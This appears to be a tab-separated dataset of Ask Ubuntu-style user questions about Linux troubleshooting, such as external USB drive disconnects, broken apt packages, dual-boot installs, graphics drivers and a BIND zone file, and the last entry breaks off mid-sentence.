433422	external hard drive disappears even during file operation	i have a western digital green 2tb sata disk in an icy box ib-368stu3-b box connected via usb 3.0 . at a certain moment , the disk is not available anymore ( and the blue led on the back of the box shut down ) . see dmesg log : [ 418367.616545 ] usb 7-2 : new superspeed usb device number 2 using xhci_hcd [ 418367.633699 ] usb 7-2 : new usb device found , idvendor=05e3 , idproduct=0731 [ 418367.633709 ] usb 7-2 : new usb device strings : mfr=3 , product=4 , serialnumber=5 [ 418367.633715 ] usb 7-2 : product : usb 3.0 mass storage device [ 418367.633720 ] usb 7-2 : manufacturer : raid sonic [ 418367.633725 ] usb 7-2 : serialnumber : 0000000000000806 [ 418372.632296 ] usb 7-2 : set sel for device-initiated u1 failed . [ 418376.219833 ] usb-storage 7-2:1.0 : usb mass storage device detected [ 418376.220738 ] scsi2 : usb-storage 7-2:1.0 [ 418376.222967 ] usbcore : registered new interface driver usb-storage [ 418377.221322 ] scsi 2:0:0:0 : direct-access wdc wd20 ezrx-00d8pb0 80.0 pq : 0 ansi : 0 [ 418377.222015 ] sd 2:0:0:0 : attached scsi generic sg2 type 0 [ 418377.222420 ] sd 2:0:0:0 : [ sdc ] 3907029164 512-byte logical blocks : ( 2.00 tb/1.81 tib ) [ 418377.223166 ] sd 2:0:0:0 : [ sdc ] write protect is off [ 418377.223175 ] sd 2:0:0:0 : [ sdc ] mode sense : 03 00 00 00 [ 418377.223924 ] sd 2:0:0:0 : [ sdc ] no caching mode page found [ 418377.223933 ] sd 2:0:0:0 : [ sdc ] assuming drive cache : write through [ 418377.226889 ] sd 2:0:0:0 : [ sdc ] no caching mode page found [ 418377.226904 ] sd 2:0:0:0 : [ sdc ] assuming drive cache : write through [ 418377.255267 ] sdc : sdc1 [ 418377.258061 ] sd 2:0:0:0 : [ sdc ] no caching mode page found [ 418377.258072 ] sd 2:0:0:0 : [ sdc ] assuming drive cache : write through [ 418377.258080 ] sd 2:0:0:0 : [ sdc ] attached scsi disk [ 418378.570903 ] ext4-fs ( sdc1 ) : recovery complete [ 418378.571188 ] ext4-fs ( sdc1 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 427069.908051 ] xhci_hcd 0000:01:00.0 : timeout while waiting for address device command [ 427070.165440 ] xhci_hcd 0000:01:00.0 : stopped the command ring failed , maybe the host is dead [ 427070.165440 ] xhci_hcd 0000:01:00.0 : abort command ring failed [ 427082.535178 ] xhci_hcd 0000:01:00.0 : hc died ; cleaning up [ 427082.535232 ] usb 6-1 : usb disconnect , device number 2 [ 427082.536024 ] [ sched_delayed ] sched : rt throttling activated [ 427082.536122 ] usb 7-2 : usb disconnect , device number 0 [ 427082.940059 ] usb 7-2 : device not accepting address 2 , error -22 [ 427082.940172 ] sd 2:0:0:0 : device offlined - not ready after error recovery i exchanged it with another box ( same but a new one ) , same effect . i changed the dd in it with a seagate green 2tb , same effect . i tested on 2 usb3 ports , 2 usb2 ports , another laptop , ubuntu ( the distro currently running my laptops ) , debian stable ( to test another kernel ) and sysrescue , same effect . the first time , it stopped while i was doing an rsync on it , so it was in activity ( i copied 1tb of data on it ) and all of a sudden , i received errors input/output errors and /dev/sdc1 not existing anymore . any idea what it could be ? thanks for the help ! best regards , raph
433424	xchat has huge lag and shows ' as text	when someone types a message in xchat i get a huge lag and all of the lines except for the latest one shows up as a ' mark . i have uninstalled and re installed xchat , reinstalled the os with 12.04 13.10 and 14.04 , i have tried not using a multimonitor setup . below on the right screen is a picture of the error .
433425	scratch 1.4 not available on ubuntu 13 anymore ?	i used to run older versions of ubuntu that included scratch 1.4 . i have a fresh ubuntu 13.10 ( installed today ) and scratch is just not there anymore . the software center does not show any scratch in its search results , plus the link to the debian/ubuntu installation here fails to work . is this because we are expected to use scratch 2.0 ? scratch 1.4 is useful to us in a number of situations . i would only like to understand if there is a way to get it back on the new ubuntu . many thanks in advance .
433427	13.10 ubuntu mouse problem	i have upgraded from ubuntu 12.04 to 13.10 and i 'm currently experiencing a mouse problem . the pointer blinks very fast and most of the time is not even visible . i 've tried the solution given in a different post , which was to change something on the display settings , but without any outcome . on 12.04 there was no such a problem .
433429	can not flash galaxy nexus ( 'maguro ' ) device	i 've got a problem when tried to flash my android . my phone was already unlocked . i performed factory reset and after enable developer mode . here code from terminal : mikalai @ mikalai-hp-compaq-6000-pro-sff-pc : ~ $ sudo ubuntu-device-flash -- channel=trusty 2014/03/12 18:36:23 expecting the device to expose an adb interface ... 2014/03/12 18:36:23 device is |maguro| 2014/03/12 18:36:24 flashing version 188 from trusty channel and server https : //system-image.ubuntu.com to device maguro 2014/03/12 18:36:25 start pushing /home/mikalai/.cache/ubuntuimages/gpg/image-signing.tar.xz to device 2014/03/12 18:36:25 start pushing /home/mikalai/.cache/ubuntuimages/gpg/image-master.tar.xz to device 2014/03/12 18:36:25 start pushing /home/mikalai/.cache/ubuntuimages/trusty/maguro/version-188.tar.xz to device 2014/03/12 18:36:25 can not push /home/mikalai/.cache/ubuntuimages/gpg/image-master.tar.xz to device if anybody know what i did wrong , please advise . thank you for any help .
433431	how to disable grub installation	on my hard drive , i have archlinux with fully customized grub . i want to install xubuntu 14.04 on other partition . how to disable grub installation during xubuntu installation process ?
433432	xmonad with a 5 minute screensaver and 10 minute suspend on idle	i 'd really like to have i3lock kick in after 5 minutes of user idle behaviour , going to suspend after 10 minutes . i thought the following ( .xsession ) would work , but the pm-suspend never kicks in : xautolock -locker `` i3lock -c000000 '' -time 5 -killer `` sudo /usr/sbin/pm-suspend '' -killtime 10 -corners 0-00 & the i3lock works as expected , but the pm-suspend is never called . i considered just firing off two processes of xautolock , but it insists on only one . i have my sudoers file setup so that i never have to type my password to use pm-suspend . any ideas why this does n't work as expected ? any alternatives ? ( that do n't use xscreensaver )
433433	why is my sd card not transferring files to ssd ?	i have a memory card reader , and when i insert a sd card and began to copy pictures or vidioes from the sd card to my ssd ( hard disk ) after one or two files the error appears : error splicing file : input/output error and the sd card disappeared from the computer and i need to restart the computer to see here again , and the all things again and again until i finish
433434	wireless not working `` ubuntu 12.04 lts `` ( hp 635 notebook pc )	hp-wifi : wireless lan soft blocked : yes hard blocked : no 1 : hp-bluetooth : bluetooth soft blocked : yes hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : yes 3 : hci0 : bluetooth soft blocked : no hard blocked : no , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , lspci 00:00.0 host bridge : advanced micro devices , inc. [ amd ] family 14h processor root complex 00:01.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] wrestler [ radeon hd 6310 ] 00:01.1 audio device : advanced micro devices , inc. [ amd/ati ] wrestler hdmi audio 00:11.0 sata controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 sata controller [ ahci mode ] 00:12.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : advanced micro devices , inc. [ amd/ati ] sbx00 smbus controller ( rev 42 ) 00:14.2 audio device : advanced micro devices , inc. [ amd/ati ] sbx00 azalia ( intel hda ) ( rev 40 ) 00:14.3 isa bridge : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 lpc host controller ( rev 40 ) 00:14.4 pci bridge : advanced micro devices , inc. [ amd/ati ] sbx00 pci to pci bridge ( rev 40 ) 00:14.5 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci2 controller 00:15.0 pci bridge : advanced micro devices , inc. [ amd/ati ] sb700/sb800/sb900 pci to pci bridge ( pcie port 0 ) 00:15.1 pci bridge : advanced micro devices , inc. [ amd/ati ] sb700/sb800/sb900 pci to pci bridge ( pcie port 1 ) 00:15.3 pci bridge : advanced micro devices , inc. [ amd/ati ] sb900 pci to pci bridge ( pcie port 3 ) 00:16.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:16.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ehci controller 00:18.0 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 0 ( rev 43 ) 00:18.1 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 1 00:18.2 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 2 00:18.3 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 3 00:18.4 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 4 00:18.5 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 6 00:18.6 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 5 00:18.7 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 7 02:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5209 pci express card reader ( rev 01 ) 06:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 07:00.0 network controller : qualcomm atheros ar9285 wireless network adapter ( pci-express ) ( rev 01 )
433440	overlapping line from smaller disaply in dualhead mode	i have a problem on both gnome shell and unity that is best described with the following photo : http : //i.imgur.com/jqwr3rh.jpg this is my external monitor . it 's a fhd monitor and my laptop monitor is 1366x768 px the white line on the left side pointed to by the green arrow is supposed to be on the laptop screen but is instead showing up on the external monitor . they overlap so to say ( it 's a maximized application on laptop monitor ) . like i said ... the problem exists on both unity and gnome shell ( i had regular ubuntu installed before today , now it 's `` ubuntu gnome '' ) . my graphics card is amd radeon 7670m or 7770m not sure right now . the drivers are open source one i have some problems with the proprietary ones so i could not test what happens with them . also , my external monitor is set to primary ... but it also happens when the laptop display is primary . any ideas on how to fix this ?
433444	install popcorn time from source files	how can i install popcorn time beta ? i see on their website that they only offer a 64-bit installation files , but the sources are open . i ca n't use the usual ./configure & & make . so , what can i do ?
433451	how to close/end/terminate an accidental `` if '' in the terminal ?	so tab completion is great ... unless you 're a n00b ... and you type the first part of ifconfig and then hit tabenter real quick ... in which case you end up with : ( not actual terminal input ) ~ $ if > > > ' > `` > end > ^c > > ) > ( ) > ] > > [ ] > ] > ; > > > [ ] > ; aognf' > > what 's really weird is ctrlc did n't even work . i know about quotation marks ( which is why that 's what i tried first ) , but that knowledge did n't help . how can i break out of one of these fat-fingered mistakes next time , without closing the terminal ? bonus point for answering what is this thing that i 've accidentally started doing ?
433453	why are there no icons/images in libreoffice help browser ?	why in any page of the libreoffice help ( viewed with libreoffice browser by pressing f1 ) ca n't i see any images/icons , but something which seems to be a default image with the name of the icon which should have been displayed ( vnd.sun.star.zip most of the time ) ?
433455	how to map a local ubuntu server in windows 8.1 ?	i am currently running ubuntu server using oracle 's virtualbox . i would like to map a network drive to my local ubuntu server in windows 8.1 . i can connect to my server using putty just fine . i can also view my site in my browser just fine . i have apache2 and openssh installed . any ideas ? edit : i can access my site via browser by http : //localhost/
433459	move audio stream from openal application to different audio device	i have two different audio output devices : an internal sound card and an external dac/amp . when starting an openal application ( i first observed the issue with minecraft , but i suspect it affects all applications that use openal for audio playback ) , the internal sound card is selected for output , and i can not change the device using pavucontrol ( or kmixer on kubuntu ) . the option to select an alternate device is present , but choosing the device has no effect . how can i select an alternate audio playback device for openal applications ?
433470	directories for dummies	i am very new to ubuntu . i am trying to learn how to srm a file , however i need to know how the directory name in order to type it out in the terminal . can someone please help me figure out how to see the full path of a certain file ? i have bitbleach now , and that is working now , but ffor future reference , how do i access the names of directories . windows expolorer used to have a title bar with the full path . thanks !
433471	every time i try to upgrade from ubuntu 13.04 to 13.10 , it fails	how do i add space to my /boot directory ? every time i try to upgrade i am told that i need 20mb more space ( for a total of about 80mb ) , and i have already run commands to free up all unused kernels and headers . i have 60mb free , and am currently using 40mb . i am really stuck . please help .
433473	how to set a default file manager for qt 's app ?	i am running on ubuntu with awesomewm which does not have specific file manager . when i launch vlc or any other qt app and try to open a file from there , it does segfault after the following error message : < application_name > /kdeui ( kiconloader ) : error : standard icon theme `` oxygen '' not found ! do you know how to set a specific file manager for qt apps and why it 's expecting a kde part one ? basically , how does it work ? why are only gtk 's app able to open a file manager ? is there a lib missing for qt ? do they both have their own default file manager ?
433475	touchpad not working after a while	i keep having trouble with my 12.04lts install ! i now have everything working fine the way i want but the touchpad does not work anymore ... it was not working at first during the install and the first boot . it started working after installing the nvidia driver 331-update and after reboot it stopped working again ... i would like to know if someone know a work around for this . i already tried the : sudo modprobe -r psmouse sudo modprobe psmouse proto=imps solution , and it is not working for me . my computer is a gigabyte p35k , with a nvidia gtx 765m .
433479	telnet connection drop while sending attachment with wireless connection	i use an expect script for sending a mail by telnet . if i include an attachment of an average size in the code ( 300 k or more ) , my script works for logging , helo , auth login , mail from , rcpt to , but when it sends data it blocks somehow before the end , and i am logged out of telnet without any message . that happens with normal speed connection ( wireless connection for instance , even though connection speed is fair ) , but not with higher speed connections . ( for instance , data sending ends up connecting to my router by ethernet , but not connecting to my router by wireless ) . i am wondering if there is a know reason for that ( timeout if data sending exceed three seconds or another amount of time ? ) , and if it is possible to solve the problem changing the configuration of telnet . thanks , cheers
433480	access windows xp files from ubuntu 12.04	i 've just installed ubuntu 12.04 , dual boot with windows xp , and i would now like to access my windows xp files from ubuntu . how do i do so ? my ubuntu desktop menu does not have 'applications ' , 'places ' , or 'system ' , as seen on one or two websites that i 've investigated . i 've installed 'gparted ' and managed to open the terminal window , type sudo -s , ... , /mnt/windows i can not find a folder called 'windows ' . this is day 2 of my entire ubuntu experience , so i 've a lot to learn . any assistance will be much appreciated ! thanks
433482	how to find name of the virtual machine ubuntu server is being hosted on ?	is it possible to find out what version and what type of virtual machine is my ubuntu server being hosted on its on a remote server ? -thanks in advance .
433488	installing ubuntu 12.10 downloads	how do i fix the following : the upgrade needs a total of 76.2 m free space on disk '/boot ' . please free at least an additional 76.2 m of disk space on '/boot ' . empty your trash and remove temporary packages of former installations using 'sudo apt-get clean ' .
433489	wondering if i could use ubuntu server as a backup server for my windows ?	i 'm planning to install ubuntu as a windowsdualboot and the windowsdualboot guide says that i need to do a backup . i was thinking of using the ubuntu server as a backup hosting but i 'm not so sure . i dont have much knowlege in the linux os let alone ubuntu as i 'm only going to use ubuntu for my coding os and as a seperation from my misc stuff on my windows 7 . i 'm thinking of using amanda as well but i have absolutely no idea what they are .
433490	my screen moves when i move my mouse to the right or bottom edge of the screen . how do i disable this ?	when i move my mouse to the right or bottom edge of the screen , my desktop moves off the screen partially and a black strip appears . how can i disable this ?
433491	wd my book 3tb external usb 3.0 drive having issues	i am having an issue when using my wd my book 3tb usb 3.0 external drive in the 3.0 i/o port on my asrock 990fx extreme9 board . i installed the etron usb 3.0 driver while it was connected into the port . the device also comes with an ses driver so i also installed it . but it only works for about 5 minutes when connected via 3.0. works great when plugged into 2.0. should i uninstall the device as well as the etron driver and start over again ? please help .
433492	installing ubuntu and windows 8 dual boot	so i have windows 8 pre installed i have shrunk my original c : which was 700 gb in two equal halfs . i have also disabled the secure boot and enabled legacy support . now when i boot into ubuntu and select the partition which i want to install to the only partition that shows up is the total 700 gb not the two separate ones that i created earlier . so my question is how do get ubuntu to recognize the second partition do i dont install ubuntu over my windows 8 partition .
433493	how to install the rigth driver for my graphic card nvidia geforce fx 5600 on ubuntu 12.04 32bit ?	i have reinstall my computer so many times , trying many suggestions available on the net and nothing seems to work . i do need your help . believe me when i say , i do try a lot to find solutions for my computer problems , but now it seem to be one i do not know how to resolve . my computer is a pentium 4 and my graphic card nvidia geforce fx 5600 . i reinstalled ubuntu 12.04.02 . i updated and upgraded everything via the command line . now i have a nvidia driver version 173.14.39 . i believe this version is too new for my graphic card , but i do not know how to change it . when i watch a video , my computer froze after a few minutes of watch . i believe it will froze for other application that use too much of my gpu . i need a solution that will make my computer stable and durable . thank you .
433494	package system broken after attempting e18 compile	i recently came across a problem and ca n't seem to find a solution in any forums . i recently attempted to compile enlightenment e18 from source . as i went along i took care of any dependencies that came about . however , after a while it became apparent that i could not do so from ubuntu . so now , i have a broken package system that seems wo n't repair . attempting sudo apt-get -f install gives me this output : use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libeina-dev libevas-dev libevas1 suggested packages : libevas-doc the following new packages will be installed : libeina-dev libevas-dev libevas1 0 upgraded , 3 newly installed , 0 to remove and 232 not upgraded . 8 not fully installed or removed . need to get 0 b/1,483 kb of archives . after this operation , 5,405 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 349556 files and directories currently installed . ) unpacking libevas1 ( from ... /libevas1_1.7.7-1ubuntu1_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/libevas1_1.7.7-1ubuntu1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/evas/utils/evas_image_loader.svg ' , which is also in package evas-generic-loaders 1.8.2~201401230955-1ppa1~saucy unpacking libeina-dev ( from ... /libeina-dev_1.7.7-1_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/libeina-dev_1.7.7-1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/libeina.so ' , which is also in package libefl 1.8.5~201401230949-1ppa1~saucy unpacking libevas-dev ( from ... /libevas-dev_1.7.7-1ubuntu1_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/libevas-dev_1.7.7-1ubuntu1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/libevas.so ' , which is also in package libefl 1.8.5~201401230949-1ppa1~saucy errors were encountered while processing : /var/cache/apt/archives/libevas1_1.7.7-1ubuntu1_amd64.deb /var/cache/apt/archives/libeina-dev_1.7.7-1_amd64.deb /var/cache/apt/archives/libevas-dev_1.7.7-1ubuntu1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) attempting to do a repair from the ubuntu software center gives me this : installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 349556 files and directories currently installed . ) unpacking libevas1 ( from ... /libevas1_1.7.7-1ubuntu1_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/libevas1_1.7.7-1ubuntu1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/evas/utils/evas_image_loader.svg ' , which is also in package evas-generic-loaders 1.8.2~201401230955-1ppa1~saucy no apport report written because maxreports is reached already unpacking libeina-dev ( from ... /libeina-dev_1.7.7-1_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/libeina-dev_1.7.7-1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/libeina.so ' , which is also in package libefl 1.8.5~201401230949-1ppa1~saucy no apport report written because maxreports is reached already unpacking libevas-dev ( from ... /libevas-dev_1.7.7-1ubuntu1_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/libevas-dev_1.7.7-1ubuntu1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/libevas.so ' , which is also in package libefl 1.8.5~201401230949-1ppa1~saucy no apport report written because maxreports is reached already errors were encountered while processing : /var/cache/apt/archives/libevas1_1.7.7-1ubuntu1_amd64.deb /var/cache/apt/archives/libeina-dev_1.7.7-1_amd64.deb /var/cache/apt/archives/libevas-dev_1.7.7-1ubuntu1_amd64.deb error in function : dpkg : dependency problems prevent configuration of libecore-input1 : libecore-input1 depends on libevas1 ( > = 1.7.7 ) ; however : package libevas1 is not installed . dpkg : error processing libecore-input1 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libecore-evas1 : libecore-evas1 depends on libecore-input1 ( > = 1.7.7 ) ; however : package libecore-input1 is not configured yet . libecore-evas1 depends on libevas1 ( > = 1.7.7 ) ; however : package libevas1 is not installed . dpkg : error processing libecore-evas1 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libecore-dev : libecore-dev depends on libecore-evas1 ( = 1.7.7-1 ) ; however : package libecore-evas1 is not configured yet . libecore-dev depends on libevas-dev ( > = 1.7.7 ) ; however : package libevas-dev is not installed . libecore-dev depends on libeina-dev ( > = 1.7.7 ) ; however : package libeina-dev is not installed . dpkg : error processing libecore-dev ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libeeze-dev : libeeze-dev depends on libecore-dev ( > = 1.7.7 ) ; however : package libecore-dev is not configured yet . libeeze-dev depends on libeina-dev ( > = 1.7.7 ) ; however : package libeina-dev is not installed . dpkg : error processing libeeze-dev ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libecore-imf1 : libecore-imf1 depends on libevas1 ( > = 1.7.7 ) ; however : package libevas1 is not installed . dpkg : error processing libecore-imf1 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libeet-dev : libeet-dev depends on libeina-dev ( > = 1.2.0 ) ; however : package libeina-dev is not installed . dpkg : error processing libeet-dev ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libecore-fb1 : libecore-fb1 depends on libecore-input1 ( > = 1.7.7 ) ; however : package libecore-input1 is not configured yet . dpkg : error processing libecore-fb1 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libecore-x1 : libecore-x1 depends on libecore-input1 ( > = 1.7.7 ) ; however : package libecore-input1 is not configured yet . dpkg : error processing libecore-x1 ( -- configure ) : dependency problems - leaving unconfigured i 'm really stuck here , please help me !
433495	can not mount nas server	i have read the threads related to this issue but all of them start from ahead of where i am . my nas is connected to the routeur its ip address is 192.168.1.41 , port 3620 i can copy files back and forth with nautilus i want now to access this nas in some way from the console . i presume i have to mount it ? for now i have the followings : $ showmount -e 192.168.1.41 clnt_create : rpc : port mapper failure - unable to receive : errno 113 ( no route to host ) and when i try to mount it : $ mount -t smbfs whaqtever-i-try-there mount : type de système de fichiers « smbfs » inconnu # unknown smbfs file system
433496	how to unhide application crash reports in lubuntu ?	i had lxappearance crash a few times when trying to install icon themes as described here : https : //bugs.launchpad.net/ubuntu/+source/lxappearance/+bug/952997 the first few times there was crash report i could read , then it stopped appearing i think because the crash report window had pre checked the option to not display future reports from this app . how do i change that preference back to being able to see the reports ?
433499	is there a gui ruby managers for ubuntu ?	what is a good ubuntu ruby management software ( like jewelry box ) which has a gui ?
433500	dns is fine but www do n't work	i currently have a server with a static ip address and setup dns on it . i have my dns server working correctly for my domain . i can create an a or cname record , restart bind9 and it works . i have only had a problem with my `` www '' record . i have changed my zone file tons of times and it does n't seem to work if i ping or go to www.mydomain.com . here is my zone file : $ ttl 14400 mydomain.com . in soa mydomain.com . randy.mydomain.com . ( 2013032600 ; serial number 86400 ; refresh 7200 ; retry 3600000 ; expire 86400 ; minimum ) mydomain.com . 86400 in ns ns1.mydomain.com . mydomain.com . 86400 in ns ns2.mydomain.com . mydomain.com . 14400 in a 1.2.3.4 ro1 14400 in a 1.2.3.4 ns1 14400 in a 1.2.3.4 ns2 14400 in a 1.2.3.4 dev 14400 in a 1.2.3.4 randy 14400 in a 1.2.3.4 test1 in cname mydomain.com . www 14400 in a 1.2.3.4 i 'm new at bind but looked at a lot of what was in the dns at my current webhost . the records dev , test1 , and randy i created and they worked as soon as i restarted bind9 . i can ping `` www.mydomain.com '' from the server . but not from outside . any ideas ?
433506	why am i unable to update from software updater ?	i am unable to update through software updater . after clicking install now , it shows `` requires installation from untrusted package '' . then there is two options : settings and ok . i click ok but the software updater window closes and stops .
433513	how can i launch a specific application bypassing the global menu in unity ?	so , trying to get up to speed with latex in vim/gvim ... problem is the beginners tutorial for vim-latexsuite assumes gvim and the gui menus . okay , got gvim right here . problem is , under unity and the global app menu , the menus are truncated and do n't show the keyboard shortcuts that they should for most entries , or in the case of the tex-suite menus , entries like '2 : article ' are simply truncated to '2 : ' . not helpful at all ! i know the menus themselves work - starting gvim using sudo gvim , which does not use the global app menu but the local menus , looks just fine - like gvim on any other platform or desktop , i.e . like it should . how do i force that behaviour under unity for a regular user ( i.e . not using sudo ) ?
433516	computer will only load when ran in safe mode	i have a toshiba satellite l755 that has been on ubuntu for years . i recently had to replace the palm rest and after doing so the system worked correctly . i decided to go ahead and do a clean install of ubuntu before giving the computer back to my wife . it will only boot to the point where i see the ubuntu logo and my mouse pointer appears . i have tried to install 12.04 , 13.10 i have used multiple flash drives and dvd 's . i have also tried fedora they all get to the same place the mouse pointer appears and the system freezes . i can hold shift down and load into recover mode and than it will boot correctly with full use of the computer . i have tested the ram and swapped ram everything seems ok . i have also swapped hard drives and it is the same result . does anyone have any ideas ? ? thank you
433520	captcha text does not appear	when trying to create an ubuntu one account after a new install of ubuntu 13.10 ( 32 bit ) no text appears in captcha window on create account window and submission is not accepted . repeated reloads does not help . internet connection is working fine through firefox
433525	displaylink udl in xubuntu 13.10	i 'm using xubuntu saucy salamander ( 13.10 ) . i 'm trying to connect displaylink wireless monitor with my linux machine . my configuration is nvidia gt310m intel hd graphics for 1st gen i5 processors [ with optimus graphics - bumblebee ] and uname -r is 3.11.0-12-generic and dmesg provides me [ 580.150091 ] usb 2-1.2 : new high-speed usb device number 6 using ehci-pci [ 580.243210 ] usb 2-1.2 : new usb device found , idvendor=17e9 , idproduct=4047 [ 580.243216 ] usb 2-1.2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 580.243219 ] usb 2-1.2 : product : wusb audio/video device [ 580.243222 ] usb 2-1.2 : manufacturer : alereon [ 580.243225 ] usb 2-1.2 : serialnumber : 00000000-00030c [ 580.245689 ] [ drm ] vendor descriptor length : e0 data:00 00 00 00 00 00 00 00 00 00 00 [ 580.245694 ] [ drm : udl_parse_vendor_descriptor ] *error* unrecognized vendor firmware descriptor [ 580.584559 ] raw edid : [ 580.584567 ] 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 580.584569 ] 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 580.584572 ] 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 580.584574 ] 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 580.584576 ] 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 580.584578 ] 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 580.584581 ] 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 580.584583 ] 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 580.584588 ] udl 2-1.2:1.0 : dvi-i-1 : edid invalid . [ 580.585584 ] udl 2-1.2:1.0 : fb1 : udldrmfb frame buffer device [ 580.585592 ] [ drm ] initialized udl 0.0.1 20120220 on minor 1 [ 580.707775 ] usbcore : registered new interface driver snd-usb-audio and lsmod | grep udl gives me udl 24626 0 drm_usb 13134 1 udl syscopyarea 12529 1 udl sysfillrect 12701 1 udl sysimgblt 12640 1 udl drm_kms_helper 52651 2 udl , i915 drm 296739 5 udl , i915 , drm_usb , drm_kms_helper however , xrandr -- listproviders only gives me providers : number : 1 provider 0 : id : 0x47 cap : 0xb , source output , sink output , sink offload crtcs : 3 outputs : 5 associated providers : 0 name : intel also , only 1 framebuffer ( fb0 for intel ) is registered . how can i work this problem out ? thank you p.s . the device is based on dl-125 chip .
433526	long black screen before lubuntu login , after grub	i 'm using lubuntu 13.10 dual booted with windows 8 . after grub when loading lubuntu there is 5~10s black screen and then shows lubuntu login . it slows down booting speed . can someone tell me how to fix this .
433527	ubuntu 12.04 is running very slow	ubuntu 12.04 is very slow.i have a 512mb ram and 1024mb swap area.even the swap area and cpu utilization is lower than 50 % .can anyone help me with this or is this a compactability issue
433532	eclipse code fonts are not readable , font color and bg color are the same	can not read codes in eclipse . the font color is same as bg color any fix for this ? the font color is same as background color , can we change this to a human readable form ? is there any options in eclipse to do this ?
433533	q4 wine need help	i tried to download q4wine and everything went well but when i tried to open the software it gave me this : can not find or execute the 'wine ' binary . make sure that this binary is available by search path variable and see also install file for application depends
433535	is there a way to force ubuntu to install in bios mode ?	i 'm currently trying to triple boot osx , windows 8.1 , and ubuntu on my macbook pro 5,3 . i have 2 hard drives . one only has osx on it and the other has windows 8.1 and ubuntu . that hard drive uses an mbr partition table . i installed windows 8.1 first and then tried to install ubuntu 12.04.4 , however it said it was unable to install grub to the target and would n't be able to boot . i tried both installing it to the root partition , and creating a separate /boot partition , but neither worked . i then tried installing ubuntu 13.10 and that installed successfully , however it would n't boot . i can get to the grub menu , but when i select ubuntu , it just gets stuck on a blank purple screen . i believe the problem is it 's booting using efi mode . i 'm using a usb stick to install ubuntu and when i boot off of it all i see if efi boot . also during the installation , when i 'm choosing partitions , there 's an efigrub format , but no biosgrub . there are 3 solutions i could think of : find a way to install ubuntu in bios mode install grub separately from ubuntu using boot-repair or something similiar install ubuntu on my other hard drive that contains osx i 'm not exactly sure how to do the first 2 , so if anyone thinks it would work and knows what to do , some help would be well appreciated .
433536	how to install ubuntu and delete windows 7 and keep the drive d : /	sorry if my english is bad . i 'm using slax booting using usb right now . in my netbook theres a windows 7 and jolios installed . i ca n't boot that both os . the windows 7 is having a missing/corrupt registry/system32 and the jolios have gnome problem which ca n't boot . i tried to fix that two os , but i failed and i 'm not a super it man . now , i want to install ubuntu as my main os completely and delete windows 7 . the windows 7 is installed in drive c : and all of my important files is in drive d : . is it possible to install the ubuntu using slax running in usb and delete only drive c and windows 7 and keep the drive d : ? i have a big fear that when i try to install the ubuntu , the drive d : might delete or lost . thank you . i do
